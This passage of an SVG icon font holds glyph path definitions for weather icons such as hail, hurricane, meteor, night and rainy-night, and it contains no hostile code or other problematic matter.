1-7-2l-1-14c0-1-1-2-2-3l-11-7c-3-1-3-5 0-7z m-94 51l0-8c0-1-1-2-2-2l-7-5c-2-1-2-4 0-5l8-3c1 0 2-1 2-2l2-8c0-3 3-3 4-2l6 7c1 1 2 1 2 1l9-1c2 0 4 3 3 4l-5 8c0 1-1 2 0 2l3 8c1 2-1 5-3 4l-8-2c-1 0-2 0-3 0l-6 6c-2 2-4 1-5-2z m84 5c1 0 1-1 1-1l1-6c1-2 3-2 3-1l4 5c1 0 1 0 2 0l6 0c1 0 2 1 1 3l-3 5c0 0 0 1 0 1l3 6c0 1-1 3-2 2l-6-1c-1 0-1 0-2 0l-5 4c-1 1-2 0-3-1l0-6c0-1 0-1-1-2l-5-3c-1 0-1-2 0-3l6-2z m-105 84c1 0 2-1 2-1l1-8c1-1 3-2 4-1l5 6c0 1 1 1 2 1l7-1c2 0 3 2 2 4l-4 6c0 1 0 1 0 2l3 7c1 2-1 3-2 3l-8-2c0 0-1 0-2 1l-5 5c-2 1-4 0-4-2l0-7c-1-1-1-2-1-2l-7-4c-1-1-1-3 0-4l7-3z m-123-80c1 0 1 0 1-1l2-5c0-1 1-1 2 0l4 4c0 0 0 0 1 0l5 0c1 0 2 1 1 2l-2 5c-1 0-1 1 0 1l2 5c0 1-1 2-2 2l-5-1c-1 0-1 0-2 0l-3 3c-1 1-3 1-3-1l0-5c0 0-1-1-1-1l-4-3c-1 0-1-2 0-2l4-3z m-137-634c0-25-20-45-44-45s-45 20-45 45c0 25 20 45 45 45s44-20 44-45z m204-7c0-21-17-38-38-38s-37 17-37 38 17 38 37 38 38-17 38-38z m-104-99c0-16-13-29-28-29s-29 13-29 29 13 29 29 29 28-13 28-29z m-19 88c0-8-7-14-15-14s-14 7-14 14 6 15 14 15 15-7 15-15z m227 34c0-16-13-29-29-29s-29 13-29 29 13 29 29 29 29-13 29-29z" />
<glyph glyph-name="hail-rainy-night" horiz-adv-x="1000" unicode="&#xee5a;" d="M605 67c-27-26-53-53-80-80-5-5-6-13-2-20 3-7 9-11 20-11 3 0 7 2 11 6 26 26 52 52 78 79 8 8 8 17 0 26-9 8-19 8-27 0z m100-39c-2-1-4-1-5-2-19-11-34-27-46-45-4-7 0-15 5-20 6-5 14-7 21-3 16 12 31 26 42 43 7 11-3 27-17 27z m107 382c-44 43-97 55-155 34-11-4-15-4-20 8-38 95-127 147-228 136-91-11-164-84-181-182-1-6 0-14-7-17-17-7-29-16-40-28l0 0s-77-73-2-157c2-3 4-5 7-7 0-1 0-1 1-1l0 0c18-18 42-28 70-31 30-3 59 0 89-1l255 0c39 0 74-1 109 1 62 2 107 32 132 88 24 54 12 116-30 157z m-241 295c-25-20-40-47-42-79-1-12 0-25 3-36 40-17 74-46 98-86 4 0 8 0 13 0 68 0 110 57 111 104-16-20-36-31-61-33-24-3-46 5-65 21-16 13-26 31-29 51-4 32 5 59 28 82-22-2-40-10-56-24z m-37 45c1-1 2-2 2-3l3-13c1-3 5-4 7-2l8 10c1 1 2 2 3 2l13-1c3-1 5 3 4 6l-7 10c-1 1-1 3 0 4l5 12c1 3-2 6-5 5l-12-3c-1 0-3 0-4 1l-9 9c-3 2-7 0-7-3l-1-13c0-1-1-2-2-3l-11-7c-3-1-2-6 1-7l12-4z m213-124l12-5c1 0 2-1 3-2l2-13c1-3 5-4 7-2l8 10c1 1 3 2 4 2l13-2c3 0 5 4 3 6l-6 11c-1 1-1 3-1 4l5 12c2 3-1 6-4 5l-13-3c-1 0-2 0-3 1l-10 8c-2 2-6 1-6-2l-1-13c0-1-1-3-2-3l-11-7c-3-2-3-6 0-7z m-92 27c1 0 1-1 2-2l2-8c0-2 3-3 4-1l6 6c0 1 1 1 2 1l8-1c2 0 4 3 3 4l-5 8c0 0 0 1 0 2l3 8c1 2-1 4-3 3l-8-2c-1 0-2 0-2 1l-7 6c-1 1-4 0-4-2l-1-9c0-1 0-1-1-2l-7-4c-2-1-2-4 0-5l8-3z m82 27c1 0 1 0 1-1l2-6c0-1 2-1 3 0l3 4c1 1 1 1 2 1l6-1c1 0 2 2 1 3l-3 5c0 0 0 1 0 2l3 5c0 1-1 3-2 2l-6-1c-1 0-1 0-2 0l-4 4c-1 1-3 0-3-1l0-6c0-1-1-1-1-2l-5-3c-2 0-1-2 0-3l5-2z m-221 4c1 0 1 0 1-1l1-4c0-2 2-2 3-1l3 4c0 0 1 0 1 0l5 0c1 0 2 1 2 2l-3 4c0 1 0 1 0 2l2 4c0 1-1 3-2 2l-5-1c0 0-1 0-1 0l-4 4c-1 0-2 0-2-1l0-5c0-1-1-1-1-2l-4-2c-1-1-1-2 0-3l4-2z m-193-616c0-24-19-43-43-43s-44 19-44 43 20 44 44 44 43-20 43-44z m198-7c0-20-16-36-36-36s-37 16-37 36c0 21 16 37 37 37s36-16 36-37z m-101-96c0-15-12-28-28-28s-28 13-28 28 13 28 28 28 28-12 28-28z m88-31c0-12-10-22-22-22-11 0-21 10-21 22 0 11 10 21 21 21 12 0 22-10 22-21z m-107 117c0-8-6-14-14-14s-14 6-14 14 6 14 14 14 14-6 14-14z" />
<glyph glyph-name="hail-rainy-sunny" horiz-adv-x="1000" unicode="&#xee5b;" d="M822 427c-45 44-100 57-160 35-11-4-16-5-21 8-39 98-131 152-235 140-95-11-169-86-187-188-1-6 0-14-8-17-17-7-30-17-41-29l0 0s-79-75-1-162c2-3 4-5 6-8 0 0 1 0 1-1l0 0c19-18 43-29 73-31 31-3 61-1 92-1l264 0c40 0 76-1 112 0 64 3 110 33 136 92 24 55 12 120-31 162z m-187-326c-29-29-57-57-85-86-6-6-7-14-3-22 4-7 10-12 21-12 3 0 8 3 12 6 28 28 56 56 84 85 8 8 8 19-1 28-9 9-19 9-28 1z m107-43c-2 0-4-1-6-2-20-12-36-29-49-48-5-8 0-16 6-21 6-6 15-8 22-4 17 13 33 28 45 46 8 12-4 29-18 29z m-300 584c-2-4-4-8-5-13 75 2 142-31 185-91 2 4 4 7 6 11 25 51 5 113-46 139-52 26-114 5-140-46z m212-37c-1-6 2-13 8-16 2-1 4-1 6-1 16 1 31 1 47 3 8 0 13 7 13 15s-7 14-15 14c-16-1-31-2-47-3-6 0-11-6-12-12z m-64 93c8-3 16 0 20 7 4 7 7 13 10 20l10 19 0 1c4 7 1 16-7 20-7 3-16 1-20-7-6-13-13-26-19-39-4-8-1-17 6-21z m-221-36c7-4 13-7 20-10l20-10c7-4 15-1 19 6 4 7 2 16-5 20-14 7-28 14-41 20-8 4-17 0-20-7-3-7 0-16 7-19z m291-113c-7 3-16 0-19-7-3-8 0-16 7-20 7-3 13-7 20-10 7-3 13-7 20-10 7-4 15-1 19 6 4 7 2 16-5 20-14 7-28 14-42 21z m-20 103c4-3 9-3 14 0 13 8 26 17 39 26 6 4 7 13 3 19-4 7-13 9-19 5-14-8-27-16-40-25-8-7-7-20 3-25z m-120 63c11-5 22 2 22 14-1 15-2 30-3 45-1 8-7 14-16 13s-14-7-14-15c1-15 2-30 3-45 0-5 3-9 8-12z m-72-17c2-2 4-4 6-5 6-3 13-2 18 3 5 5 5 12 2 18-8 13-17 25-25 37-5 8-14 9-21 5-7-5-8-13-4-21 8-12 16-24 24-37z m-161-619c0-25-20-46-46-46s-47 21-47 46 21 47 47 47 46-21 46-47z m213-7c0-22-18-39-40-39s-39 17-39 39 18 40 39 40 40-18 40-40z m-108-103c0-16-14-30-30-30s-30 14-30 30c0 17 13 30 30 30s30-13 30-30z m93-34c0-12-10-23-23-23s-22 11-22 23 10 23 22 23 23-10 23-23z m-114 126c0-8-7-15-15-15s-15 7-15 15 7 15 15 15 15-7 15-15z" />
<glyph glyph-name="hail-rainy" horiz-adv-x="1000" unicode="&#xee5c;" d="M630 123c-33-32-66-65-98-98-7-7-8-17-4-25 5-9 12-14 25-14 3 0 9 3 13 7 33 32 65 65 97 97 10 10 10 22 0 33-11 10-23 10-33 0z m123-49c-2 0-4 0-6-1-23-15-42-34-57-57-5-8 0-17 7-24 7-7 17-9 25-3 20 14 38 31 52 52 9 14-4 33-21 33z m133 473c-55 53-120 68-192 42-13-5-19-5-25 10-47 117-157 182-281 167-114-13-203-103-224-224-1-8 0-17-9-21-20-8-36-20-49-35l0 0s-96-90-3-194c3-3 6-6 8-9 1 0 1-1 2-1l0 0c22-22 51-35 87-38 36-3 73 0 110-1l315 0c48 0 92-1 135 1 76 2 132 39 163 109 29 66 14 144-37 194z m-604-423c0-29-25-53-54-53-30 0-54 24-54 53 0 30 24 54 54 54 29 0 54-24 54-54z m244-8c0-25-20-45-45-45s-46 20-46 45 21 46 46 46 45-21 45-46z m-124-119c0-19-16-34-35-34s-35 15-35 34 16 35 35 35c19 0 35-15 35-35z m107-39c0-14-11-26-26-26s-26 12-26 26c0 15 12 26 26 26s26-11 26-26z m-131 145c0-9-8-17-18-17s-17 8-17 17c0 10 8 18 17 18s18-8 18-18z" />
<glyph glyph-name="hail-sunny" horiz-adv-x="1000" unicode="&#xee5d;" d="M820 430c-45 44-99 56-159 35-11-4-15-5-21 8-39 97-129 151-232 139-94-11-169-86-186-187-1-6 0-13-8-17-16-7-29-17-40-29l0 1s-79-75-2-161c2-3 4-6 7-8 0 0 0-1 1-1l0 0c18-18 42-29 72-31 30-3 61 0 91-1l261 0c40 0 76-1 112 0 63 3 109 33 134 91 25 55 13 119-30 161z m-377 213c-2-4-4-8-5-12 74 1 141-32 183-91 2 4 4 7 6 11 26 50 5 112-45 138-52 25-113 5-139-46z m210-36c-1-6 2-13 8-16 2-1 4-2 6-1 16 0 31 1 46 2 8 1 14 8 13 15 0 8-6 15-14 14-16 0-31-1-47-2-6-1-11-6-12-12z m-63 92c7-4 16-1 20 7 3 6 6 13 9 19l10 19 0 1c4 7 1 16-6 20-8 3-16 1-20-7-7-13-13-26-20-39-4-8-1-16 7-20z m-219-36l19-10 20-10c7-4 15-1 19 6 4 7 2 16-5 20-14 7-27 14-41 20-7 4-16 0-19-7-4-7-1-15 7-19z m288-112c-7 3-16 0-19-7-3-7 0-16 7-20l20-10 19-9c8-4 16-2 20 6 4 7 2 16-6 20-13 7-27 13-41 20z m-20 102c5-2 10-2 14 0 13 9 26 17 39 26 6 4 7 13 3 19-4 7-13 9-19 5-14-8-27-16-39-25-9-7-8-20 2-25z m-118 63c10-5 21 2 21 13-1 15-2 30-3 45 0 8-7 14-15 13-9 0-15-7-14-15 0-15 1-29 2-44 1-5 3-10 9-12z m-72-17c2-2 4-4 6-5 6-3 13-2 18 3 4 5 5 12 1 18-8 12-16 25-24 37-5 7-14 9-21 4-7-5-8-13-3-21 7-12 15-24 23-36z m-61-621c0-25-21-46-46-46s-47 20-47 46c0 26 21 46 47 46s46-20 46-46z m210-7c0-22-17-39-39-39s-39 17-39 39 18 39 39 39c22 0 39-18 39-39z m-107-102c0-17-13-30-30-30s-29 13-29 30 13 29 29 29 30-13 30-29z m93-34c0-12-10-23-23-23s-22 11-22 23 10 22 22 22 23-10 23-22z m-113 125c0-8-7-15-15-15-9 0-15 7-15 15s6 15 15 15c8 0 15-7 15-15z m234 35c0-17-13-30-29-30s-30 13-30 30 13 29 30 29c16 0 29-13 29-29z" />
<glyph glyph-name="hail-thunder-night" horiz-adv-x="1000" unicode="&#xee5e;" d="M808 410c-43 43-95 55-153 34-11-4-15-5-20 8-38 94-125 145-225 134-91-11-162-83-179-180-1-6 0-13-8-16-16-7-28-17-39-29l0 1s-76-73-2-156c2-2 4-5 7-7 0 0 0-1 1-1l0 0c18-17 41-28 70-30 29-3 58-1 88-1 11-1 12 5 15 14l41 151c3 10 7 15 19 15 39-1 79-1 118 0 13 0 14-4 11-15-8-28-16-56-24-87h127c-19-27-36-51-55-78 38 0 73-1 108 0 61 2 105 32 130 88 24 53 12 115-30 155z m-299-191c-12-1-17 1-13 15 8 24 14 49 21 74 3 9 0 12-9 12-23-1-45-1-68 0-7 0-11-2-13-10-14-49-27-98-41-147-2-8 0-12 9-11 17 0 34-1 52 0 13 1 19 0 14-17-14-54-25-109-38-163l3-3c58 83 117 165 177 250-35 0-65 0-94 0z m-197-146c0-24-19-44-44-44-24 0-44 20-44 44 0 25 20 45 44 45 25 0 44-20 44-45z m317-7c0-20-17-37-38-37-20 0-37 17-37 37 0 21 17 38 37 38 21 0 38-17 38-38z m-246-125c0-16-13-28-29-28-15 0-28 12-28 28s13 28 28 28c16 0 29-12 29-28z m171-4c0-12-10-21-21-21-12 0-22 9-22 21 0 12 10 21 22 21 11 0 21-9 21-21z m-163 119c0-8-6-14-14-14s-14 6-14 14c0 8 6 14 14 14s14-6 14-14z m340 33c0-16-13-28-29-28s-28 13-28 28 13 28 28 28 29-12 29-28z m-151 615c-26-20-40-47-42-80-1-13 0-25 3-37 40-17 75-46 99-87 4 0 9 0 13 0 69 0 112 58 113 106-17-21-37-32-62-34-25-3-47 5-66 21-16 14-26 31-29 52-5 32 5 59 28 83-22-2-41-10-57-24z m-38 45c1 0 2-1 3-3l3-13c0-3 4-4 6-1l9 10c1 1 2 1 3 1l13-1c3 0 6 3 4 6l-7 11c-1 1-1 3 0 4l5 12c1 3-2 6-5 5l-12-3c-2 0-3 0-4 1l-10 9c-2 2-6 0-6-3l-1-13c0-1-1-3-2-3l-11-7c-3-2-3-6 0-7 0 0 12-5 12-5z m217-125l12-5c1-1 2-2 2-3l3-13c1-3 5-4 7-1l8 10c1 1 3 1 4 1l13-1c3 0 5 3 4 6l-7 11c-1 1-1 2-1 4l5 12c2 3-1 6-4 5l-13-3c-1 0-2 0-3 1l-10 9c-3 2-7 0-7-3l-1-13c0-2-1-3-2-3l-11-7c-3-2-2-6 1-7z m-94 27c1 0 2-1 2-2l2-8c0-2 3-3 4-1l6 6c0 1 1 1 2 1l9 0c2-1 4 2 2 4l-4 7c-1 1-1 2 0 2l3 8c1 2-1 4-3 4l-9-2c-1 0-1 0-2 0l-7 6c-1 2-4 0-4-2l-1-8c0-1 0-2-1-2l-7-5c-2-1-2-4 0-4l8-4z m84 28c0 0 1-1 1-1l1-6c0-2 2-2 3-1l4 5c0 0 1 0 1 0l6 0c2-1 3 1 2 2l-3 5c-1 1-1 1 0 2l2 5c1 2 0 3-2 3l-6-2c0 0-1 0-1 1l-5 4c-1 1-3 0-3-2l0-5c0-1-1-2-1-2l-5-3c-1-1-1-2 0-3l6-2z m-224 4c0 0 0 0 1-1l1-5c0-1 1-1 2 0l3 3c1 1 1 1 2 1l5 0c1-1 2 1 1 2l-3 4c0 1 0 1 0 2l2 4c1 1 0 3-1 2l-5-1c-1 0-1 0-2 0l-3 4c-1 0-3 0-3-1l0-5c0-1-1-1-1-2l-4-2c-1-1-1-2 0-3l5-2z" />
<glyph glyph-name="hail-thunder-sunny" horiz-adv-x="1000" unicode="&#xee5f;" d="M820 428c-45 44-99 57-159 35-11-4-16-5-21 8-39 97-129 151-233 139-94-11-168-86-186-187-1-6 0-13-7-16-17-8-30-18-41-30l0 1s-79-75-2-162c3-2 5-5 7-7 0 0 1-1 1-1l0 0c19-18 43-29 72-31 31-3 61-1 92-1 11-1 13 6 15 15 14 52 29 104 43 156 3 11 7 16 20 16 40-1 81-1 122-1 13 1 15-3 11-15-8-29-16-58-24-90h131c-20-28-37-53-57-81 40 0 76-1 112 0 63 2 109 33 135 91 24 55 12 119-31 161z m-311-198c-12-1-17 1-13 16 9 25 14 50 22 76 3 10 0 13-10 12-23 0-46 0-69 0-8 0-12-2-14-9-14-51-29-102-43-153-2-8 0-12 9-12 18 1 36 0 54 1 14 0 20-1 15-18-14-56-27-113-40-169l3-3c61 86 121 171 184 259-36 0-67 0-98 0z m-203-151c0-25-20-46-46-46s-46 21-46 46 21 46 46 46 46-21 46-46z m328-7c0-21-18-39-39-39s-39 18-39 39 18 39 39 39 39-18 39-39z m-255-130c0-16-13-30-30-30s-29 14-29 30 13 29 29 29 30-13 30-29z m177-4c0-12-10-22-22-22s-22 10-22 22 10 22 22 22 22-10 22-22z m-168 123c0-8-7-14-15-14s-15 6-15 14 7 15 15 15 15-7 15-15z m351 35c0-17-13-30-29-30s-30 13-30 30 14 29 30 29 29-13 29-29z m-284 549c-3-4-4-8-6-13 74 2 140-30 181-89 2 4 4 7 6 11 25 50 5 110-45 136-50 25-111 5-136-45z m207-36c-1-6 2-12 7-15 2-1 4-2 7-2 15 1 30 2 45 3 8 0 13 7 13 15 0 7-6 14-14 14-15-1-31-2-46-3-7-1-11-6-12-12z m-63 91c8-3 16-1 20 7 3 6 6 13 10 19l9 19 0 0c4 8 1 16-6 20-7 4-16 1-20-7-6-12-13-25-19-38-4-8-1-16 6-20z m-216-36c7-3 13-6 19-9l20-10c7-4 15-1 19 6 4 7 2 16-6 20-13 7-26 13-40 20-7 3-16 0-19-7-3-8 0-16 7-20z m285-110c-7 3-16 0-19-7-3-7 0-16 7-19 7-4 13-7 20-10l19-9c7-4 15-2 19 5 4 7 2 16-6 20-13 7-26 14-40 20z m-20 101c5-3 9-3 14 0 12 8 25 16 38 25 6 4 7 13 3 19-4 7-12 9-19 5-13-8-26-16-38-25-9-6-7-20 2-24z m-117 62c10-5 21 2 21 13-1 15-2 29-3 44 0 8-7 14-15 14-8-1-14-7-14-16 1-14 2-29 3-43 0-6 3-10 8-12z m-70-17c1-2 3-4 5-4 6-4 13-2 18 2 4 5 5 12 1 18-8 12-16 24-24 36-5 8-14 9-20 5-7-5-9-13-4-21 8-12 16-24 24-36z" />
<glyph glyph-name="hail-thunder" horiz-adv-x="1000" unicode="&#xee60;" d="M886 550c-55 53-120 68-192 42-13-5-19-5-25 10-47 117-157 182-281 167-114-13-203-103-224-224-1-8 0-17-9-21-20-8-36-20-49-35l0 0s-96-90-3-194c3-3 6-6 8-9 1 0 1-1 2-1l0 0c22-22 51-35 87-38 36-3 73 0 110-1 14-1 16 7 19 18 17 63 35 126 52 189 3 12 8 18 23 18 49-1 98-1 147 0 16 0 19-4 14-19-10-35-19-70-30-108h159c-24-34-45-64-69-98 48 0 92-1 135 1 77 2 132 39 163 109 29 66 14 144-37 194z m-375-239c-15 0-21 1-16 19 10 30 17 62 26 92 4 12 1 15-11 15-28 0-56 0-84 0-9 0-15-2-17-12-17-61-34-122-51-184-3-9-1-14 10-14 22 1 44 0 66 1 16 0 23-1 18-21-18-68-32-136-48-204 1-1 2-2 3-3 73 102 146 205 222 311-43 0-81 1-118 0z m-245-182c0-30-25-55-55-55s-55 25-55 55c0 31 24 55 55 55s55-24 55-55z m395-8c0-26-21-47-47-47-25 0-46 21-46 47 0 25 20 46 46 46 26 0 47-21 47-46z m-308-157c0-20-15-36-35-36s-36 16-36 36 16 35 36 35c20 0 35-16 35-35z m215-5c0-15-12-27-27-27s-27 12-27 27 12 27 27 27 27-12 27-27z m-204 149c0-10-7-18-17-18-10 0-18 8-18 18 0 10 8 17 18 17 10 0 17-7 17-17z m424 41c0-20-16-35-35-35s-36 15-36 35 16 36 36 36 35-16 35-36z" />
<glyph glyph-name="hail" horiz-adv-x="1000" unicode="&#xee61;" d="M886 552c-55 53-120 68-192 42-13-5-19-6-25 10-47 117-157 182-281 167-114-13-203-103-224-225-1-7 0-16-9-20-20-8-36-21-49-35l0 0s-96-90-3-194c3-3 6-6 8-9 1 0 1-1 2-1l0 0c22-22 51-35 87-38 36-4 73 0 110-1l315 0c48 0 92-1 135 0 76 3 132 40 163 110 29 66 14 144-37 194z m-522-425c0-31-25-56-56-56s-56 25-56 56 25 56 56 56 56-25 56-56z m254-9c0-26-21-47-47-47s-47 21-47 47 21 48 47 48 47-22 47-48z m-129-123c0-20-16-36-36-36s-36 16-36 36c0 20 16 36 36 36s36-16 36-36z m112-41c0-15-12-27-27-27s-28 12-28 27 13 28 28 28 27-13 27-28z m-137 151c0-10-8-18-18-18-10 0-18 8-18 18s8 18 18 18c10 0 18-8 18-18z m284 42c0-20-16-36-36-36s-36 16-36 36c0 20 16 36 36 36s36-16 36-36z" />
<glyph glyph-name="hill-night" horiz-adv-x="1000" unicode="&#xee62;" d="M709 346c61-21 118 16 134 58-21-13-43-16-65-10-23 6-40 19-52 40-10 17-13 36-9 55 6 30 24 51 51 65-19 5-39 4-57-3-30-10-51-29-64-58-26-58 2-125 62-147z m-18 257c1-1 2-2 2-3l-2-13c0-3 3-5 6-3l10 6c1 1 3 1 4 0l11-5c3-1 6 1 5 4l-3 12c0 1 1 3 1 3l9 9c2 3 1 6-2 7l-13 1c-1 0-2 1-3 2l-6 11c-1 2-5 2-6-1l-5-11c-1-1-2-2-3-2l-12-2c-3-1-4-5-2-7l9-8z m161-189c1-1 2-2 1-3l-1-12c0-3 3-6 5-4l11 6c1 1 2 1 3 0l12-5c2-1 6 1 5 4l-3 12c0 1 0 3 1 4l9 9c2 2 0 5-3 6l-12 1c-1 0-2 1-3 2l-6 11c-1 2-5 2-6-1l-5-11c-1-1-2-2-3-2l-12-2c-3-1-4-5-2-7l9-8z m-89 68l6-6c1 0 1-1 1-2l-1-8c-1-2 2-3 3-2l7 4c1 0 2 0 3 0l7-4c2 0 4 1 4 3l-2 8c0 1 0 2 0 2l6 6c1 2 0 4-2 4l-8 1c-1 0-1 1-2 1l-4 8c-1 1-3 1-4-1l-3-7c-1-1-1-1-2-1l-8-2c-2 0-3-3-1-4z m89-8c0 0 0-1 0-1l0-6c-1-1 1-2 2-1l5 2c0 1 1 1 1 0l5-2c2-1 3 1 3 2l-1 5c0 1 0 1 0 2l4 4c1 1 0 2-1 3l-6 0c0 0-1 0-1 1l-3 5c0 1-2 1-3 0l-2-5c0-1-1-1-1-1l-6-1c-1-1-1-2 0-3l4-4z m-65 107c1 0 1-1 1-2l-1-7c0-1 1-3 3-2l6 4c0 0 1 0 2 0l6-3c2-1 3 0 3 2l-2 7c0 1 1 1 1 2l5 5c1 1 0 3-2 3l-7 1c0 0-1 0-1 1l-3 6c-1 1-3 1-4 0l-3-7c0 0-1-1-1-1l-7-1c-2 0-3-2-1-4l5-4z m-132-31c0 0 0-1 0-1l-1-5c0-1 1-2 2-1l5 2c0 0 0 0 1 0l4-2c1 0 2 1 2 2l-1 4c0 1 0 1 1 2l3 3c1 1 0 3-1 3l-5 0c0 0-1 0-1 1l-2 4c-1 1-2 1-3 0l-2-4c0-1 0-1-1-1l-4-1c-1 0-2-2-1-3l4-3z m277-448l-164 197c-7 9-20 11-30 4l-31-23c-11-8-26-5-33 7l-121 198c-9 15-33 14-40-3l-26-59c-8-18-32-18-41-2l-58 110c-8 15-30 16-39 2l-283-434c-10-15 1-34 19-34h830c19 0 29 22 17 37z" />
<glyph glyph-name="hill-sunny" horiz-adv-x="1000" unicode="&#xee63;" d="M933 130l-151 181c-7 9-19 10-28 4l-29-21c-10-7-24-4-30 6l-112 183c-9 14-30 13-37-2l-24-55c-7-16-29-17-37-2l-54 102c-8 14-27 15-36 2l-260-400c-9-14 1-32 17-32h765c17 0 27 20 16 34z m-604 349c-17 24-46 41-78 41-56 2-102-42-103-97-1-47 32-88 76-99l105 155z m-181-113c-4 7-12 9-19 6-2-1-4-2-6-4-10-5-21-11-32-17-6-4-8-10-7-17 2-6 8-10 14-10 2 0 5 0 6 1 13 7 27 14 39 22 7 4 9 12 5 19z m106 167c8 0 14 6 14 14 0 7 0 14 0 21l1 21v1c0 8-6 14-14 14-8 0-15-6-15-14l-1-42c0-8 7-15 15-15z m-135-124c8 0 15 6 15 13 1 8-5 15-13 15-15 1-30 1-44 1-8 0-15-6-14-14 0-8 6-14 14-14l21-1c7 0 14 0 21 0z m197 104c5 0 9 2 12 6 8 13 16 26 23 39 4 6 1 14-5 18-6 4-15 3-19-4-8-12-16-25-23-38-6-9 2-20 12-21z m-142 13c2-5 6-7 12-7 11 0 18 11 13 21-7 12-14 25-21 37-4 7-12 10-19 6-7-4-10-13-6-20 7-12 14-24 21-37z m-80-30c12-7 25-14 37-21 2-2 4-2 6-2 7-1 13 3 15 9 2 7 0 13-6 17-12 7-25 15-37 22-7 4-16 2-20-5-4-7-2-15 5-20z m77-181c-8-12-15-24-22-35-1-3-2-5-2-8 0-7 4-12 10-14 6-2 13 0 16 6 8 12 15 24 22 36 5 7 3 16-4 20-7 5-16 2-20-5z" />
<glyph glyph-name="hurricane" horiz-adv-x="1000" unicode="&#xee64;" d="M938 640c-76 27-147 46-222 27-12-3-25-6-29-19-4-13 7-20 16-26 174-133 187-384 8-544-136-121-296-168-476-125-66 16-122 52-172 107 38-13 71-23 106-29 38-7 75-5 112 3 13 3 28 5 31 20 2 14-11 21-20 28-65 52-107 118-125 200-21 102 4 195 64 278 112 158 348 240 535 187 65-18 122-52 172-107z m-439-142c-78 0-146-67-148-146-1-79 69-150 148-149 79 0 147 67 148 146 2 79-68 149-148 149z" />
<glyph glyph-name="meteor" horiz-adv-x="1000" unicode="&#xee65;" d="M413 137c-1 6-4 12-6 20 0-9 0-17 1-25 1-6-1-9-8-11-7-2-15-4-25-7 10 1 17 1 24 1 7 1 12-1 13-9 1-7 4-15 7-25-1 9-1 17-1 24-1 9 2 13 10 15 7 1 13 3 22 6-9 0-16 0-23-1-9-2-12 3-14 12z m-296 238c0-11 2-21 4-35 0 7 1 9 1 12 3 35 3 35 37 41 1 0 1 1 2 3-2 0-4 1-7 1-26 2-26 2-30 28-1 7-2 13-4 22-4-55 1-46-38-51 0 0-1-1-2-3 8-1 14-1 21-2 10-1 16-5 16-16z m-1-171c-1 8-2 16-4 27-6-66 0-56-46-62-1 0-1-1-3-3 9-1 17-2 25-3 12-1 20-5 20-20 0-12 3-25 5-41 0 7 1 10 1 14 4 42 4 42 45 49 1 1 1 2 2 4-3 0-5 1-8 1-32 2-32 2-37 34z m161 224c2 12 1 25 6 34 5 7 18 9 28 14-31 5-27-6-34 47-3-24 4-53-36-47 32-12 32-12 36-48z m136-153c-2 71-65 131-137 130-76-1-136-64-134-141 1-72 64-132 137-130 77 2 135 63 134 141z m-217 34c-16-16-19-31-9-52 3-5 4-10-2-14-5-3-8-1-11 2-17 24-11 60 11 77 5 3 10 6 14 1 5-6 2-10-3-14z m277-32c-9-4-21-11-27 3-6 13 7 15 15 20 79 42 158 84 236 127 36 19 72 39 108 58 0 1-1 2-1 3l-9-3-245-81c-37-12-74-24-112-36-5-1-11 3-17 5 3 6 5 11 9 16 1 2 5 3 9 5 119 53 239 106 359 159l140 62-2 4c-204-66-409-132-618-199 47-22 79-52 98-96 18-43 18-87 3-133 137 75 273 150 410 225-71-25-140-52-209-80-49-20-98-40-147-59z" />
<glyph glyph-name="night" horiz-adv-x="1000" unicode="&#xee66;" d="M533 71c-67 18-119 58-153 119-29 52-38 107-26 165 17 89 70 151 151 190-58 17-115 12-171-7-87-30-151-87-188-171-78-173 7-373 184-436 181-64 351 47 398 170-63-37-127-47-195-30z m-255 620c2-3 4-6 3-10l-4-36c-1-9 8-16 16-11l32 19c3 1 7 2 10 0l33-16c8-4 18 4 16 13l-8 35c-1 4 0 8 3 10l25 27c6 7 2 17-7 18l-37 4c-3 1-6 3-8 6l-18 32c-4 8-16 7-19-1l-15-34c-2-3-5-5-8-6l-36-7c-9-1-12-13-6-19l28-24z m602-529c6 7 2 18-7 19l-36 4c-4 0-7 2-9 5l-17 33c-5 8-16 7-20-1l-15-34c-1-3-4-6-8-6l-36-7c-9-2-12-13-5-19l27-25c3-2 4-6 4-9l-5-37c-1-9 9-15 17-10l31 18c3 2 7 2 10 0l34-15c8-4 17 3 15 12l-8 36c0 3 1 7 3 10l25 26z m-391 171l18-16c2-2 3-4 3-7l-3-24c-1-6 5-10 11-7l21 12c2 1 4 1 6 0l23-10c5-3 11 2 10 8l-5 24c-1 2 0 5 1 6l17 18c4 5 1 12-5 12l-24 3c-2 0-4 2-5 4l-12 21c-3 5-11 5-13 0l-10-23c-1-2-3-4-5-4l-24-5c-6-1-8-8-4-12z m264-23c1-1 2-3 1-4l-2-17c0-4 4-7 8-5l14 9c1 0 3 1 5 0l15-7c3-2 7 1 6 5l-3 16c0 2 0 4 1 5l11 12c3 3 1 8-3 8l-16 2c-2 0-3 1-4 2l-8 15c-2 4-7 3-9 0l-7-16c0-1-2-2-3-2l-16-4c-4 0-6-5-3-8l13-11z m-192 316c1-1 2-3 2-5l-3-21c0-5 5-8 9-6l18 11c2 1 4 1 6 0l19-9c4-2 9 2 8 7l-4 20c0 2 0 4 2 5l14 15c3 4 1 10-4 11l-21 2c-2 0-3 1-4 3l-10 18c-3 4-9 4-11 0l-9-19c0-2-2-3-4-4l-20-4c-5-1-7-7-3-10l15-14z m-393-91c2-1 2-3 2-4l-2-14c0-4 3-6 6-4l13 7c1 1 2 1 3 0l13-6c3-1 7 1 6 5l-3 13c0 2 0 3 1 4l10 10c2 3 1 7-3 8l-14 1c-1 0-2 1-3 2l-7 12c-1 4-6 3-7 0l-6-13c0-1-2-2-3-2l-14-3c-3-1-4-5-2-7l10-9z" />
<glyph glyph-name="rainy-night" horiz-adv-x="1000" unicode="&#xee67;" d="M836 381c-47 46-104 59-167 36-12-4-16-5-22 9-41 102-136 158-245 146-99-12-177-90-196-197-1-6 0-14-8-17-17-8-31-18-42-31l-1 0s-83-78-1-169c2-3 4-6 7-8 0 0 0-1 1-1l0 0c19-19 45-30 76-33 32-3 64 0 96-1l275 0c42 0 80-1 118 0 66 3 114 35 141 96 26 58 14 126-32 170z m-260 318c-27-22-43-51-45-86-1-13 0-26 3-38 44-19 80-50 106-93 5 0 9-1 14-1 73 1 119 63 120 113-18-21-39-34-66-36-26-3-50 5-70 23-17 14-28 33-31 55-5 34 5 63 29 88-23-2-42-11-60-25z m-40 48c1-1 2-2 3-3l3-14c1-3 5-5 7-2l9 11c1 1 2 2 4 2l13-2c4 0 6 4 4 7l-7 11c-1 2-1 3 0 4l5 13c2 3-1 7-5 6l-13-4c-2 0-3 0-4 1l-11 10c-2 2-6 